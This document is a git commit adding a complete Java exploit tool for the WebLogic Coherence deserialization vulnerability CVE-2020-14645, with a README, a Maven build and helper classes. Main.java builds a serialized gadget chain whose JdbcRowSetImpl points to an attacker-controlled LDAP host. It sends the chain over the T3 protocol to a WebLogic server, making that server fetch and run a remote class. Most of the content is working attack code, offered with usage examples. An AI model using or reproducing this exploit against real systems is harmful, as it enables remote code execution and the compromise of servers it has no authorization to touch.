初始版本

MO0n · MO0n · commit 5a7ef336a908 · 2020-07-21T19:20:52.000+08:00
diff --git a/.gitignore b/.gitignore
@@ -21,3 +21,6 @@
 
 # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
 hs_err_pid*
+.idea/
+target/
+CVE-2020-14645.iml
diff --git a/README.md b/README.md
@@ -0,0 +1,38 @@
+# Weblogic CVE-2020-14645 coherence 反序列化漏洞验证程序
+
+## 环境
+
+- Maven 3
+
+- JDK 1.8
+
+## 编译
+
+```
+mvn package
+```
+
+## 使用
+
+具体的测试测试方法请看 [这里](https://github.com/DSO-Lab/Dubbo-CVE-2020-1948/wiki)。
+
+### 测试程序执行方法
+
+```
+java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL
+
+# 示例
+java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp http://127.0.0.1:7001
+java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp https://127.0.0.1:7002
+```
+
+## 鸣谢
+
+本项目参考和引用了项目 [@Y4er](https://github.com/Y4er) [@5up3rc](https://github.com/5up3rc) 的部分代码，特此感谢！
+
+# 参考资料
+
+https://github.com/Y4er/CVE-2020-14645
+
+https://github.com/5up3rc/weblogic_cmd
+
diff --git a/assembly.xml b/assembly.xml
@@ -0,0 +1,28 @@
+<assembly
+        xmlns="http://maven.apache.org/plugins/maven-assembly-plugin/assembly/1.1.3"
+        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+        xsi:schemaLocation="http://maven.apache.org/plugins/maven-assembly-plugin/assembly/1.1.3 http://maven.apache.org/xsd/assembly-1.1.3.xsd">
+    <id>fat-tests</id>
+    <formats>
+        <format>jar</format>
+    </formats>
+    <includeBaseDirectory>false</includeBaseDirectory>
+    <dependencySets>
+        <dependencySet>
+            <outputDirectory>/</outputDirectory>
+            <useProjectArtifact>true</useProjectArtifact>
+            <unpack>true</unpack>
+            <scope>test</scope>
+        </dependencySet>
+    </dependencySets>
+    <fileSets>
+        <fileSet>
+            <directory>${project.build.directory}/test-classes</directory>
+            <outputDirectory>/</outputDirectory>
+            <includes>
+                <include>**/*.class</include>
+            </includes>
+            <useDefaultExcludes>true</useDefaultExcludes>
+        </fileSet>
+    </fileSets>
+</assembly>
diff --git a/pom.xml b/pom.xml
@@ -0,0 +1,63 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>com.defvul</groupId>
+    <artifactId>CVE-2020-14645</artifactId>
+    <version>1.0</version>
+
+    <properties>
+        <custom.lib-path>${basedir}/libs</custom.lib-path>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+        <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
+    </properties>
+
+    <dependencies>
+        <dependency>
+            <groupId>com.oracle.coherence.ce</groupId>
+            <artifactId>coherence</artifactId>
+            <version>20.06</version>
+        </dependency>
+    </dependencies>
+
+    <build>
+        <finalName>CVE-2020-14645</finalName>
+        <plugins>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-compiler-plugin</artifactId>
+                <version>3.5.1</version>
+                <configuration>
+                    <source>1.6</source>
+                    <target>1.8</target>
+                    <fork>true</fork>
+                </configuration>
+            </plugin>
+            <plugin>
+                <artifactId>maven-assembly-plugin</artifactId>
+                <configuration>
+                    <finalName>CVE-2020-14645</finalName>
+                    <appendAssemblyId>false</appendAssemblyId>
+                    <archive>
+                        <manifest>
+                            <mainClass>com.defvul.Main</mainClass>
+                        </manifest>
+                    </archive>
+                    <descriptor>assembly.xml</descriptor>
+                </configuration>
+                <executions>
+                    <execution>
+                        <id>make-assembly</id>
+                        <phase>package</phase>
+                        <goals>
+                            <goal>single</goal>
+                        </goals>
+                    </execution>
+                </executions>
+            </plugin>
+        </plugins>
+    </build>
+
+</project>
diff --git a/src/main/java/com/defvul/Main.java b/src/main/java/com/defvul/Main.java
@@ -0,0 +1,110 @@
+package com.defvul;
+
+import com.supeream.serial.BytesOperation;
+import com.supeream.serial.Reflections;
+import com.supeream.serial.Serializables;
+import com.supeream.ssl.SocketFactory;
+import com.sun.rowset.JdbcRowSetImpl;
+import com.tangosol.util.comparator.ExtractorComparator;
+import com.tangosol.util.extractor.UniversalExtractor;
+
+import java.io.BufferedReader;
+import java.io.InputStreamReader;
+import java.net.Socket;
+import java.net.URL;
+import java.util.PriorityQueue;
+
+public class Main {
+
+    public static void main(String[] args) throws Exception {
+        if (args.length < 2) {
+            System.out.println("Usage: java -jar CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL");
+            System.out.println("\nExample: java -jar CVE-2020-14645.jar 1.1.1.1:8080/#exp http://127.0.0.1:7001");
+            return;
+        }
+
+        // CVE_2020_14645
+        UniversalExtractor extractor = new UniversalExtractor("getDatabaseMetaData()", null, 1);
+        final ExtractorComparator comparator = new ExtractorComparator(extractor);
+
+        JdbcRowSetImpl rowSet = new JdbcRowSetImpl();
+        rowSet.setDataSourceName("ldap://" + args[0]);
+        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
+
+        Object[] q = new Object[]{rowSet, rowSet};
+        Reflections.setFieldValue(queue, "queue", q);
+        Reflections.setFieldValue(queue, "size", 2);
+        byte[] payload = Serializables.serialize(queue);
+
+        URL url = new URL(args[1]);
+        send(url.getHost(), url.getPort(), payload, url.getProtocol().equals("https"));
+    }
+
+    public static void send(String host, int port, byte[] payload, boolean isSSL) throws Exception {
+        Socket sock = SocketFactory.newSocket(host, port, isSSL);
+
+        String header = "t3 7.0.0.0\nAS:10\nHL:19\n\n";
+        if (isSSL) {
+            header = "t3s 7.0.0.0\nAS:10\nHL:19\n\n";
+        }
+
+        // Handshake
+        sock.getOutputStream().write(header.getBytes());
+        sock.getOutputStream().flush();
+
+        BufferedReader br = new BufferedReader(new InputStreamReader(sock.getInputStream()));
+        String versionInfo = br.readLine();
+
+        versionInfo = versionInfo.replace("HELO:", "");
+        versionInfo = versionInfo.replace(".false", "");
+        System.out.println("Weblogic version: " + versionInfo);
+
+        // Send Payload
+        //cmd=1,QOS=1,flags=1,responseId=4,invokableId=4,abbrevOffset=4,countLength=1,capacityLength=1
+
+        //t3 protocol
+        String cmd = "08";
+        String qos = "65";
+        String flags = "01";
+        String responseId = "ffffffff";
+        String invokableId = "ffffffff";
+        String abbrevOffset = "00000000";
+        String countLength = "01";
+        String capacityLength = "10";//必须大于上面设置的AS值
+        String readObjectType = "00";//00 object deserial 01 ascii
+
+        StringBuilder datas = new StringBuilder();
+        datas.append(cmd);
+        datas.append(qos);
+        datas.append(flags);
+        datas.append(responseId);
+        datas.append(invokableId);
+        datas.append(abbrevOffset);
+
+        //because of 2 times deserial
+        countLength = "04";
+        datas.append(countLength);
+
+        //define execute operation
+        String pahse1Str = BytesOperation.bytesToHexString(payload);
+        datas.append(capacityLength);
+        datas.append(readObjectType);
+        datas.append(pahse1Str);
+
+        byte[] headers = BytesOperation.hexStringToBytes(datas.toString());
+        int len = headers.length + 4;
+        String hexLen = Integer.toHexString(len);
+        StringBuilder dataLen = new StringBuilder();
+
+        if (hexLen.length() < 8) {
+            for (int i = 0; i < (8 - hexLen.length()); i++) {
+                dataLen.append("0");
+            }
+        }
+
+        dataLen.append(hexLen);
+        sock.getOutputStream().write(BytesOperation.hexStringToBytes(dataLen + datas.toString()));
+        sock.getOutputStream().flush();
+        sock.close();
+    }
+}
diff --git a/src/main/java/com/supeream/serial/BytesOperation.java b/src/main/java/com/supeream/serial/BytesOperation.java
@@ -0,0 +1,75 @@
+package com.supeream.serial;
+
+//
+// Source code recreated from a .class file by IntelliJ IDEA
+// (powered by Fernflower decompiler)
+//
+
+import java.io.FileInputStream;
+
+public class BytesOperation {
+
+
+    public static byte[] hexStringToBytes(String hexString) {
+        if (hexString != null && !hexString.equals("")) {
+            hexString = hexString.toUpperCase();
+            int length = hexString.length() / 2;
+            char[] hexChars = hexString.toCharArray();
+            byte[] d = new byte[length];
+
+            for (int i = 0; i < length; ++i) {
+                int pos = i * 2;
+                d[i] = (byte) (charToByte(hexChars[pos]) << 4 | charToByte(hexChars[pos + 1]));
+            }
+
+            return d;
+        } else {
+            return null;
+        }
+    }
+
+    private static byte charToByte(char c) {
+        return (byte) "0123456789ABCDEF".indexOf(c);
+    }
+
+    public static byte[] byteMerger(byte[] byte_1, byte[] byte_2) {
+        byte[] byte_3 = new byte[byte_1.length + byte_2.length];
+        System.arraycopy(byte_1, 0, byte_3, 0, byte_1.length);
+        System.arraycopy(byte_2, 0, byte_3, byte_1.length, byte_2.length);
+        return byte_3;
+    }
+
+    public static String bytesToHexString(byte[] src) {
+        StringBuilder stringBuilder = new StringBuilder("");
+        if (src == null || src.length <= 0) {
+            return null;
+        }
+        for (int i = 0; i < src.length; i++) {
+            int v = src[i] & 0xFF;
+            String hv = Integer.toHexString(v);
+            if (hv.length() < 2) {
+                stringBuilder.append(0);
+            }
+            stringBuilder.append(hv);
+        }
+        return stringBuilder.toString();
+    }
+
+    public static byte[] GetByteByFile(String FilePath) throws Exception {
+        FileInputStream fi = new FileInputStream(FilePath);
+        byte[] temp = new byte[50000000];
+        int length = fi.read(temp);
+        byte[] file = new byte[length];
+
+        for (int i = 0; i < length; ++i) {
+            file[i] = temp[i];
+        }
+
+        fi.close();
+        return file;
+    }
+
+    public static void main(String[] args) throws Exception {
+        System.out.println(BytesOperation.bytesToHexString(BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/lib/remote.jar")));
+    }
+}
diff --git a/src/main/java/com/supeream/serial/Reflections.java b/src/main/java/com/supeream/serial/Reflections.java
@@ -0,0 +1,33 @@
+package com.supeream.serial;
+
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+
+public class Reflections {
+
+    public static Field getField(final Class<?> clazz, final String fieldName) throws Exception {
+        Field field = clazz.getDeclaredField(fieldName);
+        if (field == null && clazz.getSuperclass() != null) {
+            field = getField(clazz.getSuperclass(), fieldName);
+        }
+        field.setAccessible(true);
+        return field;
+    }
+
+    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
+        final Field field = getField(obj.getClass(), fieldName);
+        field.set(obj, value);
+    }
+
+    public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
+        final Field field = getField(obj.getClass(), fieldName);
+        return field.get(obj);
+    }
+
+    public static Constructor<?> getFirstCtor(final String name) throws Exception {
+        final Constructor<?> ctor = Class.forName(name).getDeclaredConstructors()[0];
+        ctor.setAccessible(true);
+        return ctor;
+    }
+
+}
diff --git a/src/main/java/com/supeream/serial/Serializables.java b/src/main/java/com/supeream/serial/Serializables.java
@@ -0,0 +1,30 @@
+package com.supeream.serial;
+
+import java.io.*;
+
+public class Serializables {
+
+    public static byte[] serialize(final Object obj) throws IOException {
+        final ByteArrayOutputStream out = new ByteArrayOutputStream();
+        serialize(obj, out);
+        return out.toByteArray();
+    }
+
+    public static void serialize(final Object obj, final OutputStream out) throws IOException {
+        final ObjectOutputStream objOut = new ObjectOutputStream(out);
+        objOut.writeObject(obj);
+        objOut.flush();
+        objOut.close();
+    }
+
+    public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
+        final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
+        return deserialize(in);
+    }
+
+    public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
+        final ObjectInputStream objIn = new ObjectInputStream(in);
+        return objIn.readObject();
+    }
+
+}
diff --git a/src/main/java/com/supeream/ssl/SocketFactory.java b/src/main/java/com/supeream/ssl/SocketFactory.java
diff --git a/src/main/java/com/supeream/ssl/TrustManagerImpl.java b/src/main/java/com/supeream/ssl/TrustManagerImpl.java
diff --git a/src/main/java/com/supeream/ssl/WeblogicTrustManager.java b/src/main/java/com/supeream/ssl/WeblogicTrustManager.java
